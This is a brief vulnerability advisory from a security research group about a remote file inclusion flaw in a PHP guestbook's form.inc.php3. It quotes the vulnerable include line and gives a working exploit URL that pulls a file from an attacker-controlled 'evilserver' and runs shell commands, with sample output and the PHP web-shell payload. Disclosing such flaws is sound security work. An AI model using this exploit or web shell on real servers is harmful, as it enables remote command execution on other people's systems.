===========================================================
============================================================
This is a simple MySQL based Guestbook.
The bug reside in form.inc.php3.
Vulnerable Code
<?
include("$lang.lang.inc.php3");
?>
/*
http://server/gb/form.inc.php3?lang=http://evilserver/cmd.gif?&cmd=id;uname%20-a;uptime
uid=99(nobody) gid=99(nobody) groups=99(nobody) Linux cyan-1.farm.de
2.4.18custom_ko_w_ipsec #10 Fre Apr 19 13:05:46 CEST 2002 i686 unknown 6:51pm
up 463 days, 15:43, 0 users, load average: 0.00, 0.01, 0.02
*/
<?
system($cmd);
?>
*/
Contact the Vendor.
http://www.soulblack.com.ar/repo/papers/advisory/myguestbook_advisory.txt
Vulnerability reported by SoulBlack Security Research
============================================================
–
SoulBlack - Security Research
http://www.soulblack.com.ar